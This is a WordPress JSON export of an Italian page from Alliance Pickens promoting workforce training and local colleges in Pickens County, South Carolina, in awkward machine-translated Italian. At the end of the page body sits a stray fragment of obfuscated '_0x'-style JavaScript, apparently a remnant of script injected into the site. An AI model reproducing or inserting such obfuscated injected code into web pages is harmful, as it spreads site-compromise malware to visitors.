{"id":6296,"date":"2020-10-28T14:30:13","date_gmt":"2020-10-28T14:30:13","guid":{"rendered":"http:\/\/alliancepickens.com\/sviluppo-della-forza-lavoro\/formazione-e-sviluppo-della-forza-lavoro\/"},"modified":"2020-12-04T20:13:07","modified_gmt":"2020-12-04T20:13:07","slug":"formazione-e-sviluppo-della-forza-lavoro","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/formazione-e-sviluppo-della-forza-lavoro\/","title":{"rendered":"Formazione e sviluppo della forza lavoro"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Una forza lavoro ben istruita e altamente qualificata \u00e8 la caratteristica distintiva di Pickens County.South Carolina.USA. Sede del tecnico S<em>cholar, il nostro<\/em>programma di sviluppo della forza lavoro offre alle aziende della contea di Pickens un vero vantaggio competitivo.<\/p>\n<p>Il Distretto scolastico della Contea di Pickens non \u00e8 secondo a nessuno in South Carolina, come il distretto scolastico pi\u00f9 alto dello stato. Il Pickens County Career and Technology Center ha anche una storia di eccellenza come il numero uno di apprendimento pratico in South Carolina. \u00c8 l&#8217;unico centro con una macchina a 5 assi disponibile per gli studenti delle scuole superiori. La Contea di Pickens ospita anche la Clemson University, la Southern Wesleyan University e il Tri-County Technical College, offrendo alle aziende della Contea di Pickens un vantaggio competitivo.<\/p>\n<p><a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/programma-tecnico-studioso\/\">Per saperne di pi\u00f9<\/a>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In questa sezione&#8221; nav_menu=&#8221;21&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10311&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;10493&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>UNIVERSIT\u00c0 CLEMSON<\/h3>\n<ul>\n<li>Carnegie R1 istituto di ricerca nella contea di Pickens<\/li>\n<li>734 milioni di euro in un valore di presentazione della proposta di ricerca nel FY20<\/li>\n<li>Clemson ha vinto tre (3) College Football Playoff National Championships; Il primo \u00e8 stato vinto nel 1981, il secondo nel 2016 e il terzo nel 2018.<\/li>\n<li>Clemson \u00e8 al primo posto nella Carolina del Sud e al numero 29 a livello nazionale per i programmi di ingegneria universitaria tra le universit\u00e0 pubbliche nazionali \u2013 USNews &amp; World Report, 2019<\/li>\n<li>Clemson \u00e8 al 11o posto a livello nazionale per le scuole pi\u00f9 innovative tra le universit\u00e0 pubbliche nazionali \u2013 USNews &amp; World Report, 2019<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>Collegio Tecnico Tri-County<\/h3>\n<ul>\n<li>Offre oltre 70 programmi di laurea, diploma e certificato associati<\/li>\n<li>Il Tri-Technical College offre esperienze di apprendimento basate sul lavoro, tra cui IL BMW Technical Scholars Program, il programma Michelin Technical Scholars, il programma Co-op Duke Energy e altro ancora<\/li>\n<li>L&#8217;educazione cooperativa, spesso chiamata Co-op, opportunit\u00e0 di integrare le lezioni in aula con l&#8217;occupazione nel mondo reale per fornire agli studenti un&#8217;esperienza lavorativa retribuita in un campo legato ai loro obiettivi accademici o professionali<\/li>\n<li>I-BEST (Integrated Basic Education and Skills Training) \u00e8 un programma di sviluppo della forza lavoro riconosciuto a livello nazionale per gli studenti che si preparano per le carriere STEM<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5674&#8243; img_size=&#8221;full&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5664&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>WESLEYAN MERIDIONALE<\/h3>\n<ul>\n<li>Liberal Arts College<\/li>\n<li>Programma di doppia iscrizione associato al Pickens County Career and Technology Center for Global Logistics and Supply Chain Management<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>IL CENTRO DI CARRIERA E TECNOLOGIA DELLA CONTEA DI PICKENS<\/h3>\n<ul>\n<li>Il Pickens County Career and Technology Center (PCCTC) \u00e8 un leader nello stato della Carolina del Sud nel soddisfare tutti gli standard Perkins riconosciuti a livello federale<\/li>\n<li>Il PCCTC ha visto il loro palloncino di iscrizione a oltre 1.400 studenti con gli studenti che iniziano i programmi gi\u00e0 all&#8217;ottavo grado<\/li>\n<li>Programmi basati sul lavoro aiutano a fornire competenze e istruzione legate al lavoro che aiuta a costruire la pipeline di talenti per le aziende nella contea di Pickens<\/li>\n<li>Gli studenti che completano questi programmi hanno almeno 2,5 anni di formazione in aula e sul posto di lavoro e lasciano il loro programma di studio con almeno (1) certificazione riconosciuta dal settore  [Read More]<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5647&#8243; img_size=&#8221;full&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;10514&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>DISTRETTO SCOLASTICO DELLA CONTEA DI PICKENS<\/h3>\n<ul>\n<li>Il distretto scolastico della contea di Pickens \u00e8 #1 distretto scolastico dello stato della Carolina del Sud<\/li>\n<li>Il distretto vanta anche un tasso di laurea in tempo 85% con il 73% degli studenti che ha ottenuto almeno una certificazione d&#8217;argento sul test WIN<\/li>\n<li>I leader delle comunit\u00e0 educative, aziendali e industriali lavorano insieme per garantire che gli studenti della contea di Pickens posseggano la formazione e l&#8217;istruzione di cui hanno bisogno quando entrano nel mondo del lavoro<\/li>\n<li>Gli studenti della contea di Pickens eccellono nei test standardizzati, partecipano ai team di gara del campionato Scienza, Tecnologia, Ingegneria e Matematica (STEM) e godono dei vantaggi dell&#8217;apprendimento in nuove strutture all&#8217;avanguardia<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4771&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>FORMAZIONE SC WORKS<\/h3>\n<p>Ogni anno, quasi 100 aziende beneficiano delle persone qualificate formate da readySC\u2122. Il programma \u00e8 unico, in quanto i lavoratori sono formati secondo le specifiche delle aziende &#8211; a poco o nessun costo. Le aziende che scelgono di trasferire o espandere le loro operazioni esistenti in South Carolina possono utilizzare la risorsa di formazione per garantire una forza lavoro forte e produttiva.[\/vc_column_text][vc_column_text]<a class=\"greenbtn\" href=\"https:\/\/www.readysc.org\/index.html\" target=\"_blank\" rel=\"noopener noreferrer\">Scopri di pi\u00f9 prontoSC\u2122<\/a>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5637&#8243; img_size=&#8221;full&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">Ulteriori informazioni sullo sviluppo della forza lavoro<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;21&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pronto per iniziare?<\/h1>\n<h3>Non vediamo l&#8217;ora di parlare con voi!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/it\/chi-siamo\/#contact_directions\">Contatta il nostro team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Una forza lavoro ben istruita e altamente qualificata \u00e8 la caratteristica distintiva di Pickens County.South Carolina.USA. Sede del tecnico Scholar, il nostroprogramma di sviluppo della forza lavoro offre alle aziende della contea di Pickens un vero vantaggio competitivo. Il Distretto scolastico della Contea di Pickens non \u00e8 secondo a nessuno in South Carolina,&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":6035,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6296","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Formazione e sviluppo della forza lavoro - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/formazione-e-sviluppo-della-forza-lavoro\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Formazione e sviluppo della forza lavoro - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Una forza lavoro ben istruita e altamente qualificata \u00e8 la caratteristica distintiva di Pickens County.South Carolina.USA. Sede del tecnico Scholar, il nostroprogramma di sviluppo della forza lavoro offre alle aziende della contea di Pickens un vero vantaggio competitivo. Il Distretto scolastico della Contea di Pickens non \u00e8 secondo a nessuno in South Carolina,&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/formazione-e-sviluppo-della-forza-lavoro\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:13:07+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/sviluppo-della-forza-lavoro\\\/formazione-e-sviluppo-della-forza-lavoro\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/sviluppo-della-forza-lavoro\\\/formazione-e-sviluppo-della-forza-lavoro\\\/\",\"name\":\"Formazione e sviluppo della forza lavoro - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\"},\"datePublished\":\"2020-10-28T14:30:13+00:00\",\"dateModified\":\"2020-12-04T20:13:07+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/sviluppo-della-forza-lavoro\\\/formazione-e-sviluppo-della-forza-lavoro\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/it\\\/sviluppo-della-forza-lavoro\\\/formazione-e-sviluppo-della-forza-lavoro\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/sviluppo-della-forza-lavoro\\\/formazione-e-sviluppo-della-forza-lavoro\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sviluppo della forza lavoro\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/sviluppo-della-forza-lavoro\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Formazione e sviluppo della forza lavoro\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Formazione e sviluppo della forza lavoro - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/formazione-e-sviluppo-della-forza-lavoro\/","og_locale":"it_IT","og_type":"article","og_title":"Formazione e sviluppo della forza lavoro - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Una forza lavoro ben istruita e altamente qualificata \u00e8 la caratteristica distintiva di Pickens County.South Carolina.USA. Sede del tecnico Scholar, il nostroprogramma di sviluppo della forza lavoro offre alle aziende della contea di Pickens un vero vantaggio competitivo. Il Distretto scolastico della Contea di Pickens non \u00e8 secondo a nessuno in South Carolina,&hellip;","og_url":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/formazione-e-sviluppo-della-forza-lavoro\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:13:07+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/formazione-e-sviluppo-della-forza-lavoro\/","url":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/formazione-e-sviluppo-della-forza-lavoro\/","name":"Formazione e sviluppo della forza lavoro - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/it\/#website"},"datePublished":"2020-10-28T14:30:13+00:00","dateModified":"2020-12-04T20:13:07+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/formazione-e-sviluppo-della-forza-lavoro\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/formazione-e-sviluppo-della-forza-lavoro\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/formazione-e-sviluppo-della-forza-lavoro\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/it\/"},{"@type":"ListItem","position":2,"name":"Sviluppo della forza lavoro","item":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/"},{"@type":"ListItem","position":3,"name":"Formazione e sviluppo della forza lavoro"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/it\/#website","url":"https:\/\/alliancepickens.com\/it\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/6296","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/comments?post=6296"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/6296\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/6035"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/media?parent=6296"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}